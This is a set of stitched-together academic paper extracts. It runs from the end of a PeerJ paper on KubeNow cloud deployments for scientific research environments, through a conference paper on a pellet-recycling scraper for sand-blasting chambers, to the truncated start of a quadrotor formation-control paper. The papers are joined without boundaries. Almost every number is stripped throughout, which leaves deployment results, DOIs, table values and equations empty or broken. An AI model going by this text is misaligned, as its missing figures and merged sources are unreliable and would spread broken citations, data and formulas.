(number of nodes) on each of the supported cloud providers. full-size doi: . /peerjcs. /fig- earlier, kubenow solves these problems by starting deployments from a preprovisioned image, and by decentralizing the dynamic configuration through cloud-init. evaluation on multiple cloud providers figure aims to highlight interesting differences in kubenow’s deployment scaling over different cloud providers. again, deployment time fluctuations for repeated runs, with the same cluster size, were not significant. we got the best scaling on gcp and embl-ebi openstack, where every time we doubled the number of provisioned nodes we measured a considerably small increase in deployment time. when deploying on azure, we always measured a slightly longer time than on the other providers, which increased by a relatively capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. small constant up to nodes. however, when we increased the number of nodes to , the deployment time on azure almost doubled. finally, on aws deployment time was better than on the other providers for small clusters ( and nodes). however, when provisioning and nodes, aws time increased by a larger factor, and it almost doubled when we scaled from to nodes. when provisioning on different cloud providers, kubenow uses the same deployment strategy, which consists in creating the infrastructure with terraform, and in waiting for the decentralized dynamic configuration to be completed on each node. the same ansible contextualization is then applied to make small adjustments in the deployment, on every cloud provider. since the deployment strategy is not cloud-specific, differences in deployment time among clouds are due to the infrastructure layer, which is managed independently by the providers. finally, it is important to point out that cloud providers can make changes in the infrastructure layer, impacting the results that we show in this study. discussion the presented methodology differs from the state of the art, as it makes use of the microservice-oriented architecture to deliver on-demand vres to scientists. this improves isolation of vres components, and enables to assemble workflows of highly- compartmentalized software components through the adoption of application containers. achieving scalability by using vms as isolation mechanism would otherwise be unfeasible, due to the overhead introduced by the guest operating systems. the implementation for our methodology, namely kubenow, has been adopted by phenomenal: a live european collaboration in medical metabolomics. various partners in phenomenal successfully deployed and leveraged kubenow-based vres on the major public cloud providers as well as on national-scale openstack installations, including those provided by embl-ebi (embl-ebi cloud, ), de.nbi (de.nbi cloud, ), snic (toor et al., ), csc (csc cloud, ) and citycloud (citycloud, ). by referring to use cases in phenomenal, we have shown the ability of our methodology to scale scientific data processing, both in terms of individual tool parallelization (‘parallelization of individual tools’) and complete analysis scaling (‘full analysis scaling’). it is important to point out that since the analyses are fully defined via workflow languages, the pipelines are intrinsically well documented and, by using kubenow and phenomenal-provided container images, any scientist can reproduce the results on any of the supported cloud providers. when comparing kubenow with other available platforms provided by the it industry, such as kubespray, it is important to point out that our methodology is conceived for analytics, rather than for highly-available service hosting. this design choice reflects a use case that we envision to become predominant in science. in fact, while the it industry is embracing application containers to build resilient services at scale, scientists are making use of the technology to run reproducible and standardized analytics. when it comes to long-running service hosting, long deployment time and complex installation procedures capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. are a reasonable price to pay, as they occur only initially. in contrast, we focus on a use case where researchers need to allocate cloud resources as needed. under these assumptions there is a need for adopting simple, fast and scalable deployment procedures. kubenow meets these requirements by providing: ( ) an uncomplicated user interaction (see ‘enabling scalable deployments’) and ( ) fast and scalable deployments (see ‘deployment automation scalability’). microservices and application containers are increasingly gaining momentum in scientific applications (peters et al., ; d’agostino et al., ; wu et al., ; williams et al., ). when it comes to on-demand vres the technology presents some important advantages over current systems. our methodology is based on publicly available information by three research initiatives in substantially different scientific domains (phenomenal, extras and ska). it is important to point out that extras and ska provide microservices-oriented vres primarly as long running platforms, and they do not cover on-demand instantiation, while our methodology made this possible in phenomenal. the requirements in terms of vre infrastructure are similar across domains, which allowed us to design our methodology as generally applicable. hence, we envision our work and the presented benchmarks as valuable guidelines for communities of practice that need to build on-demand vre systems. conclusion here, we introduced a microservice-oriented methodology where scientific applications run in a distributed orchestration platform as light-weight software containers, referred to as on-demand vres. our methodology makes use of application containers to improve isolation of vre components, and it uses cloud computing to dynamically procure infrastructure. the methodology builds on publicly available information by three research initiatives, and it is generally applicable over multiple research domains. the applicability of the methodology was tested through an open source implementation, showing good scaling for data analysis in metabolomics and in terms of deployment speed. we envision communities of practice to use our work as a guideline and blueprint to build on-demand vres. ethical approval and informed consent human-derived samples in the datasets are consented for analysis, publication and distribution, and they were processed according to the elsi guidelines (sariyar et al., ). ethics and consents are extensively explained in the referenced publications (gao et al., ; herman et al., ; ranninger et al., ). acknowledgements we kindly acknowledge contributions to cloud resources by snic, embl-ebi, citycloud, csc, aws and azure. capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this research was supported by the european commission’s horizon programme under grant agreement number (phenomenal) and the nordic e-infrastructure collaboration (neic) via the glenna and tryggve projects. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: the european commission’s horizon programme: . nordic e-infrastructure collaboration (neic). competing interests the authors declare there are no competing interests. author contributions • marco capuccini conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • anders larsson conceived and designed the experiments, contributed reagents/materi- als/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • matteo carone performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, approved the final draft. • jon ander novella, noureddin sadawi and jianliang gao performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, approved the final draft. • salman toor and ola spjuth conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the data in the study by gao et al. is publicly available: available at https://doi.org/ . /m .figshare.c. . detailed instructions for reporoducing the analysis can be found at https://github.com/csmsoftware/phnmnl-scalability. novella et al. and khoonsari et al. used public data from the methabolights repository, and in particular datasets: mtbls and mtbls . detailed instructions for reporoducing the analyses can be found at https://github.com/pharmbio/lc-ms- pachyderm and at https://github.com/phnmnl/mtbls -jupyter, respectively. capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare.c. https://doi.org/ . /m .figshare.c. https://github.com/csmsoftware/phnmnl-scalability https://github.com/pharmbio/lc-ms-pachyderm https://github.com/pharmbio/lc-ms-pachyderm https://github.com/phnmnl/mtbls -jupyter http://dx.doi.org/ . /peerj-cs. kubenow is publicly available as open-source software: https://github.com/kubenow/ kubenow detailed instruction for deploying kubenow and reproducing the experiments in ‘deployment automation scalability’ can be found at https://kubenow.readthedocs.io. phenomenal is publicly available as open-source software: https://github.com/phnmnl/ phenomenal-h /wiki. references amazon elastic container service. . available at https://docs.aws.amazon.com/ amazonecs/latest/developerguide/ecs_instances.html (accessed on may ). amazon elastic file system. . available at https://aws.amazon.com/efs (accessed on may ). ansible. . available at https://www.ansible.com (accessed on may ). armbrust m, fox a, griffith r, joseph ad, katz rh, konwinski a, lee g, patterson da, rabkin a, stoica i, zaharia m. . above the clouds: a berkeley view of cloud computing. technical report ucb/eecs- - . eecs department, university of california, berkeley. asay m. . why kubernetes is winning the container war. available at http://www. infoworld.com/article/ /cloud-computing/why-kubernetes-is-winning-the- container-war.html (accessed on may ). assante m, candela l, castelli d, cirillo r, coro g, frosini l, lelii l, mangiacrapa f, marioli v, pagano p, panichi g, perciante c, sinibaldi f. . the gcube system: delivering virtual research environments as-a-service. future generation computer systems : – doi . /j.future. . . . azure container instances. . available at https://azure.microsoft.com/en-us/services/ container-instances (accessed on may ). azure netapp files. . available at https://azure.microsoft.com/en-us/services/ storage/netapp (accessed on may ). baldini i, castro p, chang k, cheng p, fink s, ishakian v, mitchell n, muthusamy v, rabbah r, slominski a, suter p. . serverless computing: current trends and open problems. in: research advances in cloud computing. springer, – doi . / - - - - _ . bayramusta m, nasir va. . a fad or future of it?: a comprehensive literature review on the cloud computing research. international journal of information management ( ): – doi . /j.ijinfomgt. . . . bild de, bluemke da, burke gl, detrano r, diez roux av, folsom ar, greenland p, jacobs jr dr, kronmal r, liu k, nelson jc, o’leary d, saad mf, shea s, szklo m, tracy rp. . multi-ethnic study of atherosclerosis: objectives and design. american journal of epidemiology ( ): – doi . /aje/kwf . candela l, castelli d, pagano p. . virtual research environments: an overview and a research agenda. data science journal :grdi –grdi . citycloud. . available at http://citycloud.com (accessed on may ). cloud-init. . available at https://cloud-init.io (accessed on may ). capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/kubenow/kubenow https://github.com/kubenow/kubenow https://kubenow.readthedocs.io https://github.com/phnmnl/phenomenal-h /wiki https://github.com/phnmnl/phenomenal-h /wiki https://docs.aws.amazon.com/amazonecs/latest/developerguide/ecs_instances.html https://docs.aws.amazon.com/amazonecs/latest/developerguide/ecs_instances.html https://aws.amazon.com/efs https://www.ansible.com http://www.infoworld.com/article/ /cloud-computing/why-kubernetes-is-winning-the-container-war.html http://www.infoworld.com/article/ /cloud-computing/why-kubernetes-is-winning-the-container-war.html http://www.infoworld.com/article/ /cloud-computing/why-kubernetes-is-winning-the-container-war.html http://dx.doi.org/ . /j.future. . . https://azure.microsoft.com/en-us/services/container-instances https://azure.microsoft.com/en-us/services/container-instances https://azure.microsoft.com/en-us/services/storage/netapp https://azure.microsoft.com/en-us/services/storage/netapp http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.ijinfomgt. . . http://dx.doi.org/ . /aje/kwf http://citycloud.com https://cloud-init.io http://dx.doi.org/ . /peerj-cs. cloudflare. . available at https://www.cloudflare.com (accessed on may ). cloudfuse. . available at https://github.com/redbo/cloudfuse (accessed on may ). csc cloud. . available at https://research.csc.fi/cloud-computing (accessed on may ). cyvoct p. . how to deploy an efk stack to kubernetes. available at https://blog.ptrk. io/how-to-deploy-an-efk-stack-to-kubernetes (accessed on august ). d’agostino d, roverelli l, zereik g, luca ad, salvaterra r, belfiore a, lisini g, novara g, tiengo a. . a microservice-based portal for x-ray transient and variable sources. peerj preprints :e . dahlö m, scofield dg, schaal w, spjuth o. . tracking the ngs revolution: managing life science research on shared high-performance computing clusters. gigascience ( ):article giy . de.nbi cloud. . available at https://www.denbi.de/cloud (accessed on may ). duhrkop k, shen h, meusel m, rousu j, bocker s. . searching molecular struc- ture databases with tandem mass spectra using csi:fingerid. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. . elia ia, antunes n, laranjeiro n, vieira m. . an analysis of openstack vulnerabili- ties. in: th european dependable computing conference (edcc). – . emami khoonsari p, moreno p, bergmann s, burman j, capuccini m, carone m, cascante m, de atauri p, foguet c, gonzalez-beltran an, hankemeier t, haug k, he s, herman s, johnson d, kale n, larsson a, neumann s, peters k, pireddu l, rocca-serra p, roger p, rueedi r, ruttkies c, sadawi n, salek rm, sansone s-a, schober d, selivanov v, thévenot ea, van vliet m, zanetti g, steinbeck c, kultima k, spjuth o. . interoperable and scalable data analysis with microservices: applications in metabolomics. bioinformatics ( ): – doi . /bioinformatics/btz . embl-ebi cloud. . available at http://www.embassycloud.org (accessed on may ). featurefindermetabo. . available at https://abibuilder.informatik.uni-tuebingen.de/ archive/openms/documentation/rc/ . . /html/topp_featurefindermetabo.html (accessed on april ). gao j, sadawi n, karaman i, pearce j, mereno p, larsson a, capuccini m, elliott p, nicholson jk, ebbels t, glen rc. . metabolomics in the cloud: scaling computational tools to big data. arxiv preprint. arxiv: . . glusterfs. . available at https://www.gluster.org (accessed on may ). goecks j, nekrutenko a, taylor j, galaxy team. . galaxy: a comprehen- sive approach for supporting accessible, reproducible, and transparent com- putational research in the life sciences. genome biology ( ):article r doi . /gb- - - -r . google cloud filestore. . available at https://cloud.google.com/filestore (accessed on may ). capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.cloudflare.com https://github.com/redbo/cloudfuse https://research.csc.fi/cloud-computing https://blog.ptrk.io/how-to-deploy-an-efk-stack-to-kubernetes https://blog.ptrk.io/how-to-deploy-an-efk-stack-to-kubernetes https://www.denbi.de/cloud http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /bioinformatics/btz http://www.embassycloud.org https://abibuilder.informatik.uni-tuebingen.de/archive/openms/documentation/rc/ . . /html/topp_featurefindermetabo.html https://abibuilder.informatik.uni-tuebingen.de/archive/openms/documentation/rc/ . . /html/topp_featurefindermetabo.html http://arxiv.org/abs/ . https://www.gluster.org http://dx.doi.org/ . /gb- - - -r https://cloud.google.com/filestore http://dx.doi.org/ . /peerj-cs. google cloud run. . available at https://cloud.google.com/run (accessed on may ). hao j, astle w, de iorio m, ebbels tmd. . batman—an r package for the automated quantification of metabolites from nuclear magnetic reso- nance spectra using a bayesian model. bioinformatics ( ): – doi . /bioinformatics/bts . haug k, salek r, conesa mingo p, hastings j, matos p, rijnbeek m, mahendraker t, williams m, neumann s, rocca-serra p, maguire e, gonzlez-beltrán a, sansone s-a, griffin j, steinbeck c. . metabolights—an open-access general-purpose repository for metabolomics studies and associated meta-data. nucleic acids research (d ):d –d . helm. . available at https://github.com/kubernetes/helm (accessed on may ). herman s, khoonsari p, tolf a, steinmetz j, zetterberg h, akerfeldt t, jakobsson p-j, larsson a, spjuth o, burman j, kultima k. . integration of magnetic resonance imaging and protein and metabolite csf measurements to enable early diagnosis of secondary progressive multiple sclerosis. theranostics ( ): – doi . /thno. . hindman b, konwinski a, zaharia m, ghodsi a, joseph ad, katz rh, shenker s, stoica i. . mesos: a platform for fine-grained resource sharing in the data center. in: nsdi, vol. . nsdi’ proceedings of the th usenix conference on networked systems design and implementation, – . available at https://www. usenix.org/legacy/events/nsdi /tech/full_papers/hindman.pdf . javed a, heljanko k, buda a, främling k. . cefiot: a fault-tolerant iot architec- ture for edge and cloud. in: ieee th world forum on internet of things (wf- iot). ieee, – . jupyter. . available at https://jupyter.org (accessed on may ). karakoyunlu c, kimpe d, carns p, harms k, ross r, ward l. . toward a unified object storage foundation for scalable storage systems. in: cluster computing (cluster), ieee international conference on. ieee, – . karaman i, ferreira dls, boulangé cl, kaluarachchi mr, herrington d, dona ac, castagné r, moayyeri a, lehne b, loh m, de vries ps, dehghan a, franco oh, hofman a, evangelou e, tzoulaki i, elliott p, lindon jc, ebbels tmd. . workflow for integrated processing of multicohort untargeted h nmr metabolomics data in large-scale metabolic epidemiology. journal of proteome research ( ): – doi . /acs.jproteome. b . khan a. . key characteristics of a container orchestration platform to enable a mod- ern application. ieee cloud computing ( ): – doi . /mcc. . . kubenow github organization. . available at https://github.com/kubenow (accessed on may ). kubespray. . available at https://github.com/kubernetes-incubator/kubespray (accessed on may ). kurtzer gm, sochat v, bauer mw. . singularity: scientific containers for mobility of compute. plos one ( ):e doi . /journal.pone. . capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cloud.google.com/run http://dx.doi.org/ . /bioinformatics/bts https://github.com/kubernetes/helm http://dx.doi.org/ . /thno. https://www.usenix.org/legacy/events/nsdi /tech/full_papers/hindman.pdf https://www.usenix.org/legacy/events/nsdi /tech/full_papers/hindman.pdf https://jupyter.org http://dx.doi.org/ . /acs.jproteome. b http://dx.doi.org/ . /mcc. . https://github.com/kubenow https://github.com/kubernetes-incubator/kubespray http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. lampa s, dahlö m, olason pi, hagberg j, spjuth o. . lessons learned from implementing a national infrastructure in sweden for storage and analysis of next-generation sequencing data. gigascience ( ):article - x- - doi . / - x- - . laure e, edlund Å. . the e-infrastructure ecosystem: providing local support to global science. large-scale computing techniques for complex system simulations : – . luigi. . available at https://github.com/spotify/luigi (accessed on january ). manousis a, ragsdale r, draffin b, agrawal a, sekar v. . shedding light on the adoption of let’s encrypt. arxiv preprint. arxiv: . . manu ar, patel jk, akhtar s, agrawal vk, murthy knbs. . a study, analysis and deep dive on cloud paas security in terms of docker container security. in: international conference on circuit, power and computing technologies (iccpct). – . marathon. . available at https://mesosphere.github.io/marathon (accessed on april ). naik n. . building a virtual system of systems using docker swarm in multiple clouds. in: systems engineering (isse), ieee international symposium on. piscataway: ieee, – . neal f. . the state of microservices maturity. o’reilly media, inc. netto hv, lung lc, correia m, luiz af, de souza lms. . state machine replication in containers managed by kubernetes. journal of systems architecture : – doi . /j.sysarc. . . . nip.io. . available at http://nip.io (accessed on may ). novella ja, emami khoonsari p, herman s, whitenack d, capuccini m, burman j, kultima k, spjuth o. . container-based bioinformatics with pachyderm. bioinformatics ( ): – . open container initiative. . the principles of standard containers. available at https://github.com/opencontainers/runtime-spec/blob/master/principles.md (accessed on may ). openstack manila. . available at https://wiki.openstack.org/wiki/manila (accessed on may ). openstack zun. . available at https://docs.openstack.org/zun (accessed on may ). pachyderm. . available at https://pachyderm.io (accessed on may ). packer. . available at https://www.packer.io (accessed on may ). pathan a-mk, buyya r. . a taxonomy and survey of content delivery networks. technical report, . grid computing and distributed systems laboratory, univer- sity of melbourne. peters k, bradbury j, bergmann s, capuccini m, cascante m, de atauri p, ebbels tmd, foguet c, glen r, gonzalez-beltran a, günther ul, handakas e, hanke- meier t, haug k, herman s, holub p, izzo m, jacob d, johnson d, jourdan f, kale n, karaman i, khalili b, emamikhonsari p, kultima k, lampa s, larsson a, ludwig c, moreno p, neumann s, novella ja, o’donovan c, pearce jtm, capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - x- - https://github.com/spotify/luigi http://arxiv.org/abs/ . https://mesosphere.github.io/marathon http://dx.doi.org/ . /j.sysarc. . . http://nip.io https://github.com/opencontainers/runtime-spec/blob/master/principles.md https://wiki.openstack.org/wiki/manila https://docs.openstack.org/zun https://pachyderm.io https://www.packer.io http://dx.doi.org/ . /peerj-cs. peluso a, piras me, pireddu l, reed mac, rocca-serra p, roger p, rosato a, rueedi r, ruttkies c, sadawi n, salek rm, sansone s-a, selivanov v, spjuth o, schober d, thévenot ea, tomasoni m, vanrijswijk m, vanvliet m, viant mr, weber rjm, zanetti g, steinbeck c. . phenomenal: processing and analysis of metabolomics data in the cloud. gigascience ( ):article giy . ranninger c, schmidt le, rurik m, limonciel a, jennings p, kohlbacher o, huber cg. . improving global feature detectabilities through scan range splitting for untargeted metabolomics by high-performance liquid chromatography-orbitrap mass spectrometry. analytica chimica acta : – doi . /j.aca. . . . roth b, hecht r, volz b, jablonski s. . towards a generic cloud-based virtual research environment. in: computer software and applications conference workshops (compsacw), ieee th annual. piscataway: ieee, – . sariyar m, schluender i, smee c, suhr s. . sharing and reuse of sensitive data and samples: supporting researchers in identifying ethical and legal requirements. biopreservation and biobanking ( ): – doi . /bio. . . shimel a. . docker becomes de facto linux standard. available at http://www. networkworld.com/article/ /opensource-subnet/docker-becomes-de-facto- linux-standard.html (accessed on may ). terraform. . available at https://terraform.io (accessed on may ). traefik. . available at https://traefik.io (accessed on may ). travis ci. . available at https://travis-ci.org (accessed on may ). thönes j. . microservices. ieee software ( ): – . toor s, lindberg m, falman i, vallin a, mohill o, freyhult p, nilsson l, agback m, viklund l, zazzik h, spjuth o, capuccini m, möller j, murtagh d, hellander a. . snic science cloud (ssc): a national-scale cloud infrastructure for swedish academia. in: ieee th international conference on e-science (e-science). piscataway: ieee, – . vaughan-nichols sj. . containers vs. virtual machines: how to tell which is the right choice for your enterprise. available at https://www.networkworld.com/article/ /cloud-storage/containers-vs-virtual-machines-how-to-tell-which-is-the- right-choice-for-your-enterprise.html (accessed on june ). vayghan la, saied ma, toeroe m, khendek f. . deploying microservice based applications with kubernetes: experiments and lessons learned. in: ieee th international conference on cloud computing (cloud). ieee, – . vixie p, thomson s, rekhter y, bound j. . dynamic updates in the domain name system (dns update). technical report, rfc . weerasiri d, barukh mc, benatallah b, sheng qz, ranjan r. . a taxonomy and survey of cloud resource orchestration techniques. acm computing surveys (csur) ( ):article . williams cl, sica jc, killen rt, balis ug. . the growing need for microservices in bioinformatics. journal of pathology informatics :article doi . / - . . capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.aca. . . http://dx.doi.org/ . /bio. . http://www.networkworld.com/article/ /opensource-subnet/docker-becomes-de-facto-linux-standard.html http://www.networkworld.com/article/ /opensource-subnet/docker-becomes-de-facto-linux-standard.html http://www.networkworld.com/article/ /opensource-subnet/docker-becomes-de-facto-linux-standard.html https://terraform.io https://traefik.io https://travis-ci.org https://www.networkworld.com/article/ /cloud-storage/containers-vs-virtual-machines-how-to-tell-which-is-the-right-choice-for-your-enterprise.html https://www.networkworld.com/article/ /cloud-storage/containers-vs-virtual-machines-how-to-tell-which-is-the-right-choice-for-your-enterprise.html https://www.networkworld.com/article/ /cloud-storage/containers-vs-virtual-machines-how-to-tell-which-is-the-right-choice-for-your-enterprise.html http://dx.doi.org/ . / - . http://dx.doi.org/ . /peerj-cs. wu c, tobar r, vinsen k, wicenec a, pallot d, lao b, wang r, an t, boulton m, cooper i, dodson r, dolensky m, mei y, wang f. . daliuge: a graph execution framework for harnessing the astronomical data deluge. astronomy and computing : – doi . /j.ascom. . . . zhao d, mohamed m, ludwig h. . locality-aware scheduling for containers in cloud computing. ieee transactions on cloud computing epub ahead of print jan doi . /tcc. . . capuccini et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.ascom. . . http://dx.doi.org/ . /tcc. . http://dx.doi.org/ . /peerj-cs. international conference on sensor network and computer engineering (icsnce ) design of pellet recycle scraper system in sand-blasting chamber wang baoli bombardier sifang (qingdao) transportation ltd shandong , china wang junli bombardier sifang (qingdao) transportation ltd shandong ,china zhao zhipeng bombardier sifang (qingdao) transportation ltd shandong , china e-mail: @qq.com abstract—in the process of industrial sand-blasting, it is necessary to recycle the pellet. in order to solve the existing problems such as high cost, vulnerability, maintenance difficulty and low recycle efficiency in pneumatic recycling system and mechanical recycling system of pellet, we designed a trapezoidal scraper recycle system of pellet which powered by the cylinder and controlled by plc to realize the pellet collection. the core component of the system is the scraper mechanical structure which mainly composed of scraper, scraper cylinder, baffle, scraper frame, bearing. this design has the advantages such as simple structure, resistant to breakdown, easy dismantlement. by installing pneumatic valve on the cylinder, the sand scraping speed can be adjusted. the trapezoidal scraper pellet recycling system efficiency is much higher after the contrast experiments between trapezoidal scraper and mechanical screw conveyor of the original equipment. keywords-pellet; cylinder; plc; scraper; trapezoid i. introduction in order to improve the adhesion of the surface paint, it is necessary to sand-blast on the workpiece. during the sand-blasting process, pellet need to be recycled for the purpose of cost reduction [ - ]. at present, pneumatic recycling system [ ] and mechanical recycling system [ - ] are widely used in our country for pellet recycle. however, problems such as high cost, vulnerability and maintenance difficulty still exist. therefore, it is overwhelming important to design a recycle system for pellet of low cost, resistance to breakdown and easy maintenance. ii. pellet recycle system scraper-typed pellet recycle system [ ] designed by this design is mainly composed of rod, scraper, cylinder, pellet-collect container and so on. as shown in figure , is trench, is air rod and is pellet material. the air rod is fixedly connected with the pull rod. numerous scrapers with the same structure are fixedly connected with the pull rod. the scraper has the function of one-way reversing. when the air rod is retracted, the scraper will move the pellet material to the material collecting container. when the air rod is stretched out, the scraper will flip without pushing pellet, so that pellet will achieve a cycle of directional movement. by installing pneumatic valve on the cylinder, air rod speed can be adjusted. figure . scraper pellet recycle system iii. mechanical system design a. scraper structure the core component of the material recycle system is the scraper. for the scraper system designed in this design as shown in fig. , fig. , fig. , fig. , is trench, is the pellet material. the physical map is shown in figure - . scraper system is mainly composed of bearing mounting plates, scraper frame, vertical bearing, lateral bearing, scraper, baffle, bayonet and scraper cylinder as shown in figure - and figure - . scraper and scraper cylinder are in dynamic connection, with functions such as one-way flip and reverse scraping. the basic scraper structure is trapezoidal. the role of bayonet is to constrain the freedom for scraper up and down. the surface of the scraper frame is fixedly connected with the scraper cylinder and the baffle. lateral bearing and vertical bearing are cross-typed with functions of guiding and undertaking weight respectively as shown in figure - . lateral bearing and vertical bearing are mounted on the bearing mounting plate. bearing mounting plate is fixedly installed on the inner wall of the trench. one end of the scraper frame is fixedly connected with the air rod. the pneumatic control valves and proximity switch are mounted onto the air cylinder. international conference on sensor network and computer engineering (icsnce ) a a i figure . scraper system figure . a-a directional view figure . i partial view figure . physical map of trapezoidal scraper b. scraper’s working theory once the scraper-typed pellet recycle is started, the scraper frame will move the trapezoid scraper forward and backward by scraper cylinder. when the scraper moves forward, the scraper will push the pellet forward due to the pulling force of the air cylinder and the blocking effect of the baffle up on the scraper. when the scraper moves backward, the baffle won’t have blocking effect on the scraper, the scraper rotates around the scraper cylinder under the reaction force of the pellet on the ground, it won’t push the pellet material. with such a reciprocating rhyme, directional movement of pellet material can be completed as well as pellet will be collected. pneumatic valve can adjust the air rod running speed according to the current situation, hence adjust the scraping pellet speed by scraper. c. scraper performance analysis  the scraper major components are cylinder, scraper, scraper frame, bearing and so on. it has advantages such as simple structure, low cost, easy dismantlement.  this design uses trapezoidal scraper and make full use of the trench surface to supervise the height of pellet piled in case it affects scraper flip. its influence is most obvious when the width of trench is small.  the bearings are distant from the ground, which can prevent the accumulation of pellet from damaging the bearings to reduce the maintenance times.  the pneumatic speed control valve is installed onto the cylinder so the scraper speed can be reduced when there are fewer pellet, which can reduce scraper loss. iv. electrical system design according to requirements of the system, this design uses siemens s - plc to control the scraper. this product is cheap, powerful with great practicality. plc i/o allocation table is shown in table . its external wiring diagram is shown in fig . proximate to the switch, plc detects the position of the air rod and controls direction change of the cylinder through solenoid valve. when the air rod fails to change direction, the plc will stop and give alarms [ - ]. table i. plc i/o allocation input output input component address output component address sb , start i y , cylinder out q sb , stop i y , cylinder contraction q sq , cylinder stretched out until the position of test i bj , warning light q sq , cylinder contracted until the position of test i international conference on sensor network and computer engineering (icsnce ) sb sb sq sq y y bj com i i i i q q q dc v + v v figure . schema of electrical control v. efficiency comparison between trapezoidal scraper and mechanical pellet cecycle system in this design, trapezoidal scraper and the original mechanical screw conveyor pellet recycling efficiencies are compared. the same amount of pellet are placed in two ditches. with both systems under the best operating efficiency, statistics of recycle time will be collected according to kg, kg and kg pellet. the result is shown in table . table ii. pellet recovery time recycled pellet quality (kg) pellet recovery time(hour) screw conveyor trapezoidal scraper . . . . . . data show that under the same condition, the time required to complete the kg, kg, kg recycle by trapezoidal scraper is significantly less than that of the mechanical screw conveyor thus prove that the trapezoidal scraper pellet recycle system efficiency is much higher. vi. conclusion scraped pellet recycle system is proposed in this design. it uses siemens s - plc as the controller and it's core component is the trapezoidal scraper whose advantages are simple structure, resistance to breakdown and easy dismantlement. with comparison of experiments, it shows high efficiency in recycling pellet. hence it is worthwhile of popularization. references [ ] ye yangxiang, pan zhaoji. application manual for coating technology [m]. china machine press, . [ ] yao shoushan, li geyang, hu wenbing. surface science and technology [m]. china machine press, . [ ] wang xuefang. analysis of pneumatic sand-blasting system [j].electric power locomotives and urban railway vehicles, , ( ): - . [ ] wang yongli. application examples by sand-blasting machine in the coating line [j]. modern coatings, , ( ): - . [ ] liu fugui. research on screw conveyor machine of pellet [j]. rolling stock workers, ( ): - . [ ] luan xianyu, liu hongnan. design of blasting chamber scraper recycle system based on plc [j]. mechanical engineers, ( ): - [ ] liu huabo. siemens s - plc programming and application case selection [m]. china machine press, . [ ] liao changchu. s - plc programming and application [m]. china machine press, . international conference on sensor network and computer engineering (icsnce ) quadrotor formation control method based on graph and consistency theory yang sen , department of uav engineering, ordance engineering college, shijiazhuang, china school of automation science and electrical engineering, beihang university, beijing, china e-mail: @qq.com xi leiping department of uav engineering ordance engineering college shijiazhuang, china abstract—this paper introduces graph and group system consistency theory and puts forward a quadrotor formation control method. the quadrotor is described as a second-order integrator dynamic system, and the relative position deviation of different quadrotors is used to describe formation. according to the communication topology relationship between quadrotors, the formation is modeled by graph theory. the fusion of the pilot-follow and graph theory method is analyzed, and a second-order coherence algorithm with a pilot is presented. with this algorithm, the quadrotors can complete behaviors just as formation rally and formation mobility etc. finally the paper verifies the availability of the proposed method through simulation tests. keywords-formation control; graph theory; consistency theory; second-order integrator; pilot-follow method i. introduction in recent years, quadrotors become more and more popular among scientific researchers because of their small size, light weight, easy manipulation and high efficiency while performing tasks in uncertain and dangerous environment. due to the shortage of its load and the sensor performance, a single quadrotor is highly restricted in complex tasks. thus, more and more quadrotors are applied to work together. multiple quadrotors formation control is a major and basic research subject in the studies of quadrotors cooperative control. it has attracted the interests of many researchers both at home and abroad. the main formation control methods are pilot-followed method, virtual structure method, behavior-based method and graph theory method. graph theory method means to model the formation to directed graphs or undirected graphs according to the communication network topology relationship and the formation conditions, and then analyze and design the formation information flow and the formation control algorithm through mature graph theory. the method of graph theory has gradually become the mainstream of formation control as it is a fusion of several methods talked before [ ]. consistency theory has been applied in formation control research under a variety of circumstances such as the fixed topology, time-varying topology, communication time delay of ground robots, underwater vehicles and satellite systems etc [ ]. literature [ ] proposes a model of multi-robot formation control, which takes a robot as a single integrator dynamics model and analyzes the multi-robot system formation and its stability with consistency theory. as shown in literature [ ], in the grasp laboratory of the pennsylvania university, a team led by kumar describes the formation with the relative position and relative direction of the quadrotors. by introducing the error of relative position, they control the formation flight of four quadrotors with consistency algorithm. however, the control structure they describe is a centralized control structure which demands high calculation capability of the central control unit but has poor extensibility. in literature [ ], in the study of the automatic quadrotors formation, a communication topology solution is put forward based on the hamilton loop in the cascade control system. at present, most of the literature describes intelligence agents as first-order integrator power systems, which is relatively simple. but many complex systems must be described by second-order or higher order system so as to international conference on sensor network and computer engineering (icsnce ) realize accurate and effective control. this article combines graph theory method and pilot-follow method and describes a as s second order integrator system. through the second-order coherence algorithms, the formation of control method is studied under the topological structure that only one quadrotor is informed of the flight path and all the follower quadrotors can receive information from the pilot. ii. graph theory and consistency of the group system information a. graph theory graph is a data structure composed by a vertex set and the binary relation between vertexes (i.e., the set of edge), usually referred to as ( , )g v e . the collection of vertices and edges are represented as: ( ) { , , , } ( ) {( , ) : , ( )} n i j i j v g v v v e g v v v v v g      in the diagram, if node i and node j has information exchange, the edge ( , ) i j v v exists; if there is no directional information exchange, then the following exists: ( , ) ( , ) i j j i v v e v v e   the diagram is called undirected graph. if the information stream is flowing from node i to node j, then the 